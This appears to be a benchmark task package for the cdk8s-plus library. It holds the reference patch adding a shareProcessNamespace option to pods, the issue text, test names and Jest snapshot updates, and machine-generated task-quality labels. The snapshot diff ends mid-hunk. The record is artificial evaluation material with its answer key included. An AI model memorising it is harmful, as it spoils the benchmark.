respected", "can mount container to a pv", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "can allow to peer across namespaces", "can allow to multiple peers", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "can allow from peer across namespaces", "can allow from multiple peers", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload" ]
[ "Can mutate metadata", "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaultChild", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "can select namespaces", "can select all namespaces", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "can grant permissions on imported", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "fromCommand", "fromHttpGet", "fromTcpSocket", "minimal definition", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "mount options", "mount from ctor", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "cannot allow to namespaces selected by labels", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "cannot allow from namespaces selected by labels", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: AbstractPod.constructor(this: AbstractPod, props: AbstractPodProps) Location: src/pod.ts Inputs: `props` – an object extending `base.ResourceProps` that may contain the optional boolean `shareProcessNamespace` (default `false`). All other existing fields are unchanged. Outputs: Returns a new `AbstractPod` instance whose public read‑only property `shareProcessNamespace` is set to the value provided in `props` or `false` when omitted. This property is later emitted in the generated manifest (e.g., `"shareProcessNamespace": false`). Description: Adds support for the Kubernetes `shareProcessNamespace` flag to pods. When enabled, containers in the pod share a single Linux process namespace; otherwise they remain isolated. The default is `false` to maintain existing behavior. Function: AbstractPodProps (interface) Location: src/pod.ts Inputs: Optional field `shareProcessNamespace?: boolean` (default `false`). Outputs: None (type definition). Description: Extends the pod property interface to allow callers to request process‑namespace sharing when constructing a pod. The field is reflected in the pod manifest as `shareProcessNamespace`.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 11, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved", "backport" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/4902", "https://github.com/sorenlouv/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue only states a backport without detailing the required behavior, making the specification ambiguous (B4). The test patch adds \"shareProcessNamespace\": false to many snapshots, which aligns with the expected default in the golden implementation. No other B-category signals are present. Therefore the task is classified as B4 due to missing explicit acceptance criteria.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
6fbf94183964f0eabef493e1a7ae3e51b4d2482e
2024-11-13 21:56:17
cdk8s-team__cdk8s-plus-4902
diff --git a/src/pod.ts b/src/pod.ts index 3ac602bc..14e4dfd2 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -19,6 +19,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public readonly dns: PodDns; public readonly dockerRegistryAuth?: secret.ISecret; public readonly automountServiceAccountToken: boolean; + public readonly shareProcessNamespace: boolean; public readonly hostNetwork?: boolean; public readonly terminationGracePeriod?: Duration; @@ -40,6 +41,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, this.dns = new PodDns(props.dns); this.dockerRegistryAuth = props.dockerRegistryAuth; this.automountServiceAccountToken = props.automountServiceAccountToken ?? false; + this.shareProcessNamespace = props.shareProcessNamespace ?? false; this.isolate = props.isolate ?? false; this.hostNetwork = props.hostNetwork ?? false; this.terminationGracePeriod = props.terminationGracePeriod ?? Duration.seconds(30); @@ -249,6 +251,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, setHostnameAsFqdn: dns.hostnameAsFQDN, imagePullSecrets: this.dockerRegistryAuth ? [{ name: this.dockerRegistryAuth.name }] : undefined, automountServiceAccountToken: this.automountServiceAccountToken, + shareProcessNamespace: this.shareProcessNamespace, hostNetwork: this.hostNetwork, terminationGracePeriodSeconds: this.terminationGracePeriod?.toSeconds(), }; @@ -437,6 +440,14 @@ export interface AbstractPodProps extends base.ResourceProps { */ readonly automountServiceAccountToken?: boolean; + /** + * When process namespace sharing is enabled, processes in a container are visible to all other containers in the same pod. + * + * @default false + * @see https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/ + */ + readonly shareProcessNamespace?: boolean; + /** * Isolates the pod. This will prevent any ingress or egress connections to / from this pod. * You can however allow explicit connections post instantiation by using the `.connections` property.
feat(pod): shareProcessNamespace add shareProcessNamespace to pod spec. Cannot find it anywhere. https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/
**Title** Expose `shareProcessNamespace` option on Pod resources **Problem** Users need the ability to enable process‑namespace sharing for containers within a pod, but the current pod construct does not expose this setting. Consequently, manifests cannot be configured to share the process namespace, limiting certain multi‑container patterns. **Root Cause** The pod abstraction lacked a property for the Kubernetes `shareProcessNamespace` field, so it was never serialized into the generated manifest. **Fix / Expected Behavior** - Add a Boolean flag to the pod configuration API to control process‑namespace sharing. - Default the flag to `false` to preserve existing behavior. - Ensure the flag value is correctly rendered into the pod spec under `shareProcessNamespace`. - Update documentation/comments to describe the new option and reference the official Kubernetes guidance. **Risk & Validation** - Verify that existing pods remain unchanged when the flag is omitted, maintaining backward compatibility. - Add unit tests confirming that the manifest includes `shareProcessNamespace: true` only when the flag is set. - Run integration tests to ensure the generated manifests are accepted by Kubernetes without errors.
4,902
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/container.test.ts.snap b/test/__snapshots__/container.test.ts.snap index c94d5044..ee03dfa1 100644 --- a/test/__snapshots__/container.test.ts.snap +++ b/test/__snapshots__/container.test.ts.snap @@ -68,6 +68,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -129,6 +130,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -179,6 +181,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -250,6 +253,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -306,6 +310,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "volumes": Array [ Object { diff --git a/test/__snapshots__/cron-job.test.ts.snap b/test/__snapshots__/cron-job.test.ts.snap index e8f2501a..309c040f 100644 --- a/test/__snapshots__/cron-job.test.ts.snap +++ b/test/__snapshots__/cron-job.test.ts.snap @@ -52,6 +52,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -138,6 +139,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -205,6 +207,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/daemon-set.test.ts.snap b/test/__snapshots__/daemon-set.test.ts.snap index 3b07d8a5..3ab34b83 100644 --- a/test/__snapshots__/daemon-set.test.ts.snap +++ b/test/__snapshots__/daemon-set.test.ts.snap @@ -54,6 +54,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -134,6 +135,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -196,6 +198,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/deployment.test.ts.snap b/test/__snapshots__/deployment.test.ts.snap index 4a656e0c..8979adee 100644 --- a/test/__snapshots__/deployment.test.ts.snap +++ b/test/__snapshots__/deployment.test.ts.snap @@ -74,6 +74,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -194,6 +195,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -293,6 +295,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -402,6 +405,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -495,6 +499,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -586,6 +591,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -676,6 +682,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -747,6 +754,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -830,6 +838,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -901,6 +910,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -981,6 +991,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1074,6 +1085,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1164,6 +1176,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1235,6 +1248,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1318,6 +1332,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1389,6 +1404,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1469,6 +1485,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1562,6 +1579,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1652,6 +1670,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1740,6 +1759,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1825,6 +1845,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1877,6 +1898,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "tolerations": Array [ Object { @@ -2000,6 +2022,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap b/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap index c4a24c10..5381f2a1 100644 --- a/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap +++ b/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap @@ -62,6 +62,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -177,6 +178,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -305,6 +307,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -433,6 +436,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -561,6 +565,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -688,6 +693,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -815,6 +821,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -942,6 +949,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1069,6 +1077,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1196,6 +1205,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1323,6 +1333,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1450,6 +1461,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1578,6 +1590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1710,6 +1723,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1844,6 +1858,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2012,6 +2027,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2146,6 +2162,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2266,6 +2283,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2394,6 +2412,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2509,6 +2528,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2633,6 +2653,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2754,6 +2775,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2869,6 +2891,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2990,6 +3013,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "volumes": Array [ Object { diff --git a/test/__snapshots__/job.test.ts.snap b/test/__snapshots__/job.test.ts.snap index 5aca1007..106074f8 100644 --- a/test/__snapshots__/job.test.ts.snap +++ b/test/__snapshots__/job.test.ts.snap @@ -48,6 +48,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/network-policy.test.ts.snap b/test/__snapshots__/network-policy.test.ts.snap index 514e47f9..470cf8bd 100644 --- a/test/__snapshots__/network-policy.test.ts.snap +++ b/test/__snapshots__/network-policy.test.ts.snap @@ -136,6 +136,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -181,6 +182,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -267,6 +269,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -331,6 +334,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -419,6 +423,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -502,6 +507,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -584,6 +590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -671,6 +678,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -766,6 +774,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -857,6 +866,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -962,6 +972,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1048,6 +1059,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1135,6 +1147,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1180,6 +1193,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1266,6 +1280,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1330,6 +1345,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1418,6 +1434,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1501,6 +1518,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1583,6 +1601,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, 